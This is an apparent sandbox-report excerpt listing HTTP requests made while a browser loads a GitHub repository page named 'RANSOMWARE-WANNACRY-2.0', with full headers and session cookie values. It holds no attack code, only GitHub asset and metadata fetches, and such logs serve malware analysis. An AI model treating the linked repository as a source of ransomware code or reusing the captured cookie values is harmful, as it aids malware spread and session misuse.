              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_UnderlineNav_index_js-89fa5806aa3c.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_AvatarStack_AvatarStack_js-node_modules_primer_reac-558b50-c6ea7afb7179.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/repos-overview-4ddd2c275f25.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-878844713bc9.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/spoofed_commit_check/2445abd45c99c3ad9611ebcacc6cfe28451c2c0d HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: text/htmlX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/hovercards/citation/sidebar_partial?tree_name=master HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: text/htmlX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/used_by_list HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: text/fragment+htmlX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /favicons/favicon.png HTTP/1.1Host: github.githubassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/refs?type=branch HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-c537341-b93616e2fc14.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/apple-touch-icon-144x144-b882e354c005.png HTTP/1.1Host: github.githubassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/app_assets_modules_github_ref-selector_ts-b593b93f23f5.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/codespaces-1a8626dd714a.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_github_remote-form_-01f9fa-075cdbe1c5e3.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_filter--b2311f-4c891ec4eeb9.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/spoofed_commit_check/2445abd45c99c3ad9611ebcacc6cfe28451c2c0d HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-8044b2e52146.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/latest-commit/master HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: application/jsonX-Requested-With: XMLHttpRequestGitHub-Verified-Fetch: truesec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/tree-commit-info/master HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: application/jsonX-Requested-With: XMLHttpRequestGitHub-Verified-Fetch: truesec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/overview-files/master HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: application/jsonX-Requested-With: XMLHttpRequestGitHub-Verified-Fetch: truesec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/branch-count HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36GitHub-Verified-Fetch: truesec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/used_by_list HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /assets/repositories-6a44576977d0.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/tag-count HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36GitHub-Verified-Fetch: truesec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/latest-commit/master HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/tree-commit-info/master HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/branch-count HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
